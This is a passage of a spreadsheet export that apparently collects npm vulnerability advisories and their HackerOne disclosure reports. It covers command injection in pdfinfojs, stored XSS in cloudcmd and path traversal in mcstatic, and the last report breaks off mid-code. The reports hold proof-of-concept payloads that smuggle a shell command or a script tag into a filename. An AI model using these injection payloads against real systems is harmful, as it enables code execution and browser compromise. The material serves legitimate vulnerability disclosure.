  </si>
  <si>
    <t>https://hackerone.com/reports/330957.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hello , there is a Command Injection vulnerability on the &amp;quot;pdfinfojs&amp;quot; module.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; pdfinfojs&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.3.6&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;a title="https://www.npmjs.com/package/pdfinfojs" href="/redirect?signature=8e366eb7c417024adf561e75d598867aa00cbe6c&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fpdfinfojs" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/pdfinfojs&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;pdfinfo shell wrapper for Node.js&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;10 downloads in the last day&lt;br&gt;
61 downloads in the last week&lt;br&gt;
106 downloads in the last month&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The module appends the filename parameter to the command on the lines &lt;a href="/redirect?signature=dcee82b93b46672604ac2ad99756e323ca871ec9&amp;amp;url=https%3A%2F%2Fgithub.com%2Ffagbokforlaget%2Fpdfinfojs%2Fblob%2Fmaster%2Flib%2Fpdfinfo.js%23L28" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;28&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;, &lt;a href="/redirect?signature=924d70c1c5cedaeb8e02edbd5c21e1292a87eb0b&amp;amp;url=https%3A%2F%2Fgithub.com%2Ffagbokforlaget%2Fpdfinfojs%2Fblob%2Fmaster%2Flib%2Fpdfinfo.js%23L47" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;47&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; and &lt;a href="/redirect?signature=2beb56cf4faebc585e85012a9469093e340aa8e7&amp;amp;url=https%3A%2F%2Fgithub.com%2Ffagbokforlaget%2Fpdfinfojs%2Fblob%2Fmaster%2Flib%2Fpdfinfo.js%23L72" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;72&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt; without parsing the user input, thus leading to a Command Injection. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Install the module &lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install pdfinfojs
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Example code, similar to the documentation, with the malicious filename &lt;code&gt;$({touch,a})&lt;/code&gt; :&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;pdfinfo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;pdfinfojs&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="nx"&gt;pdf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;pdfinfo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;$({touch,a})&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;// Malicious payload&lt;/span&gt;
&lt;span class="nx"&gt;pdf&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getInfo&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;info&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stack&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;info&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;//info is an object&lt;/span&gt;
    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;params&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;// commandline params passed to pdfinfo cmd&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;there are a lot of possibles payloads to achieve this, used this brace expansion just because space in the file name sucks&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Run the code &lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node index.js
Error
    ... it throws an error, but the execution is successful
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Check the newly created file &lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ls
a       index.js
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="patch"&gt;Patch&lt;/h2&gt;
&lt;p&gt;It is advisable to use a module that explicitly isolates the parameters to the &lt;code&gt;pdfinfo&lt;/code&gt; command.&lt;/p&gt;
&lt;h2 id="tested-on"&gt;Tested on :&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;macOS Sierra 10.12.16&lt;/li&gt;
&lt;li&gt;NODEJS v8.4.0&lt;/li&gt;
&lt;li&gt;NPM 5.3.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;( contacted the maintainer || opened issue ) = False&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;An attacker can execute arbitrary commands on the victim&amp;#39;s machine&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-03-29T01:18:13.084Z</t>
  </si>
  <si>
    <t>2018-04-19T07:31:54.253Z</t>
  </si>
  <si>
    <t xml:space="preserve">
The module appends the filename parameter to the command on the lines 28, 47 and 72 without parsing the user input, thus leading to a Command Injection. 
</t>
  </si>
  <si>
    <t>An attacker can execute arbitrary commands on the victim's machine</t>
  </si>
  <si>
    <t xml:space="preserve">Hello , Command Injection vulnerability Â« Â»pdfinfojsÂ« Â» module.  Module  module name  pdfinfojs version  0.3.6 npm page  https //www.npmjs.com/package/pdfinfojs  Module Description   pdfinfo shell wrapper   Module Stats  10 downloads last day 61 downloads last week 106 downloads last month  Vulnerability  Vulnerability Description   module appends filename parameter command lines 28, 47 72 without parsing user input, thus leading Command Injection.    Steps Reproduce    Install module   $ npm install pdfinfojs   Example code, similar documentation, malicious filename $({touch,a})    var pdfinfo = require("pdfinfojs"),     pdf = new pdfinfo("$({touch,a})"); // Malicious payload  pdf.getInfo(function(err, info, params) {   (err) {     console.error(err.stack);   }   else {     console.log(info); //info object     console.log(params); // commandline params passed pdfinfo cmd   } });  lot possibles payloads achieve this, used brace expansion just space file name sucks   Run code   $ node Error     ... throws error, execution successful   Check newly created file   $ ls        Patch  advisable use module explicitly isolates parameters pdfinfo command.  Tested     macOS Sierra 10.12.16 NODEJS v8.4.0 NPM 5.3.0   ( contacted maintainer || opened issue ) = False  Impact  attacker execute arbitrary commands victim"s machine </t>
  </si>
  <si>
    <t>attacker execute arbitrary commands victim's machine</t>
  </si>
  <si>
    <t>[cloudcmd] Stored XSS in the filename when directories listing</t>
  </si>
  <si>
    <t>/advisories/642</t>
  </si>
  <si>
    <t>2018-05-16T15:52:37.025+00:00</t>
  </si>
  <si>
    <t>cloudcmd</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cloudcmd</t>
  </si>
  <si>
    <t>&lt;=9.1.5</t>
  </si>
  <si>
    <t>&gt;=9.1.6</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/341044.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report a Stored XSS issue in module &lt;strong&gt;cloudcmd&lt;/strong&gt;&lt;br&gt;
It allows executing malicious javascript code in the user&amp;#39;s browser.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name&lt;/strong&gt;: cloudcmd&lt;br&gt;
&lt;strong&gt;version&lt;/strong&gt;: 9.1.5&lt;br&gt;
&lt;strong&gt;npm page&lt;/strong&gt;: &lt;a title="https://www.npmjs.com/package/cloudcmd" href="/redirect?signature=17e09dd7c32f9e3ed59f480a891f71f8a179870f&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fcloudcmd" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/cloudcmd&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Cloud Commander is an orthodox web file manager with console and editor.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;4,433 downloads in the last week&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="cloudcmd3.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/288/918/1b9a8983a54e936cca04c47210e8991f377ce3a5/cloudcmd3.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=65c80c0cf74b446f5ce8263f6429a5b9285516943144a510f6910798b82bf81a" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/288/918/1b9a8983a54e936cca04c47210e8991f377ce3a5/cloudcmd3.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=65c80c0cf74b446f5ce8263f6429a5b9285516943144a510f6910798b82bf81a" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Install the module&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm i cloudcmd
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Run&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/cloudcmd/bin/cloudcmd.js --root .
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;In the target directory, create a file with name &lt;code&gt;&amp;quot;&amp;gt;&amp;lt;svg onload=alert(3);&amp;gt;&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;bash$ touch &amp;#39;&amp;quot;&amp;gt;&amp;lt;svg onload=alert(3);&amp;gt;&amp;#39;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;In the browser, go to &lt;a title="http://127.0.0.1:8080/" href="/redirect?signature=b700a3653a6781498dccc04ff53e79ddf2300d1e&amp;amp;url=http%3A%2F%2F127.0.0.1%3A8080%2F" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;http://127.0.0.1:8080/&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;, the XSS popup will fire.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="cloudcmd2.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/288/917/835081f021dd29d58d5956ef614af9f3303541fa/cloudcmd2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=4fb1304480fc8ea348f8f062363c940a76c340b85d2838fff1833b2f146c97e7" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/288/917/835081f021dd29d58d5956ef614af9f3303541fa/cloudcmd2.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJIYMMSDL3G47ZHZA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDPj0%2BNorsVr8b6QBSCK3A2BoQuLazI60UGdQANehOL7yM3f1GWriYZoNKrrU6TOlcXdVILDVEVSi3pH9CypXtHSdpT3ttLhNZCdiOZgkYtUfZX2l5Lsbb7W7oKRRceaDmV%2F5PlVVXfXrhQ8GVIJzaZ1UIo6GhUDiTlzcUJ1sbbZIG1eggdPKaU6Y%2FwXY5ygUQhIWGWd1VIQDKMrYD1VPnl5FHoamF56FqkbAHkwMhz2W%2F%2FTZjMd9go5cxcHY6YieSnzNu0Sv4gi%2FNg5%2BBLk6Tj7n83F2IIj7C3%2BOqDXAxQt41SZLNQuXU8gvRour4988J19mWfHGdbmMdmlGHqefCEjT7Slnmfg31IVo58e1GwJbblMQXRgsMKoHrLdPZfjQzq6Y7uY5aen1an5%2FtjtIfbEff7owYDuP4KB83BzNBBczNxdm1Gkwl02iS70%2FMhcg8K8WtDsjdfPBCxRk7wDCVjRM3fw3s%2BFfwg8KrvC2odo9oLslsi0FgIqtlvZs3mxw5bt7HyVa31SQlxnFOGyFbkyk7r1OiINX72%2FV3VOJaMxqSHtDhqNvaHj%2F2pHiUCs5M1kQMZULmuGiomZndCEPta7cptVj0rwo1L3s2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=4fb1304480fc8ea348f8f062363c940a76c340b85d2838fff1833b2f146c97e7" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;macOS High Sierra 10.13.4&lt;/li&gt;
&lt;li&gt;node v8.10.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;li&gt;Chrome Version 65.0.3325.181 (Official Build) (64-bit)&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let them know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;It allows executing malicious javascript code in the user&amp;#39;s browser&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-04-20T09:12:33.738Z</t>
  </si>
  <si>
    <t>2018-04-25T17:46:22.250Z</t>
  </si>
  <si>
    <t>It allows executing malicious javascript code in the user's browser</t>
  </si>
  <si>
    <t xml:space="preserve">report Stored XSS issue module cloudcmd allows executing malicious javascript code user"s browser.  Module  module name  cloudcmd version  9.1.5 npm page  https //www.npmjs.com/package/cloudcmd  Module Description   Cloud Commander orthodox web file manager console editor.   Module Stats  4,433 downloads last week    Vulnerability  Steps Reproduce    Install module  $ npm cloudcmd   Run  $ ./node_modules/cloudcmd/bin/cloudcmd.js   root .   target directory, create file name Â« Â»    bash$ touch "Â« Â» "   browser, go http //127.0.0.1 8080/, XSS popup will fire.     Supporting Material/References    macOS High Sierra 10.13.4 node v8.10.0 npm 5.6.0 Chrome Version 65.0.3325.181 (Official Build) (64 bit)   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  allows executing malicious javascript code user"s browser </t>
  </si>
  <si>
    <t>allows executing malicious javascript code user's browser</t>
  </si>
  <si>
    <t>[mcstatic] Path Traversal allows to read content of arbitrary files</t>
  </si>
  <si>
    <t>/advisories/641</t>
  </si>
  <si>
    <t>2018-05-16T15:47:09.509+00:00</t>
  </si>
  <si>
    <t>mcstatic</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mcstatic</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/312907.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is Path Traversal in mcstatic module.&lt;br&gt;
It allows to read content of arbitrary files on the remote server.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;mcstatic&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is a general file server made by nodejs. It will be easy for you to access the files on the server through the browser.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/mcstatic" href="/redirect?signature=cfba2441b50806cd25b759dbf87dad3bc118ff41&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fmcstatic" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/mcstatic&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 0.0.20&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
0 downloads in the last day&lt;br&gt;
38 downloads in the last week&lt;br&gt;
150 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1800 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;Lack of file path sanitization causes that any file on the server might be read by malicious user.&lt;/p&gt;
&lt;p&gt;If we follow code flow, we find that first file name is read from &lt;code&gt;req.url&lt;/code&gt; and check if exists:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/mcstatic/lib/staticFileHandler.js, line 19:&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;httpHelpers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getRequestPathFromUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;mockedFilePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;findMockFilePath&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;mockPaths&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;mockedFilePath&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mockedFilePath&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;normalize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;root&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stats&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;statusHandlers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;](&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;nextHandler&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;error&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Depends on HTTP method used, handler function is called (here&amp;#39;s for GET):&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/mcstatic/lib/staticFileHandler.js, line 39:&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;method&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GET&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
